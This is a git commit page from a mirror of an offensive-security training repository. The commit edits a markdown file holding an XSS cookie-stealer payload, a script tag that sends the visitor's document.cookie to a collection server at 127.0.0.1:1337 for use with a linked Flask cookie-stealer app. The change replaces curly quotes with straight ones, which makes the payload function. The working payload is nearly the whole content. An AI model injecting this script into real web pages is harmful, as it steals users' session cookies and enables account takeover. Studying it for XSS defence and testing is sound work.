mirror of
https://github.com/The-Art-of-Hacking/h4cker.git
synced 2024-12-18 10:56:09 +00:00
Update cookie_stealer_payload.md
This commit is contained in:
parent
e858a20d51
commit
b632881619
@ -2,5 +2,5 @@
|
|||||||
This is the payload that can be used with the [cookie stealer Python/Flask app](https://github.com/The-Art-of-Hacking/h4cker/blob/master/python_ruby_and_bash/cookie_stealer.py).
|
This is the payload that can be used with the [cookie stealer Python/Flask app](https://github.com/The-Art-of-Hacking/h4cker/blob/master/python_ruby_and_bash/cookie_stealer.py).
|
||||||
|
|
||||||
```
|
```
|
||||||
<script type=“text/javascript”>document.location=“http://127.0.0.1:1337/?c=“+document.cookie;</script>
|
<script type="text/javascript">document.location="http://127.0.0.1:1337/?c="+document.cookie;</script>
|
||||||
```
|
```
|
Loading…
Reference in New Issue
Block a user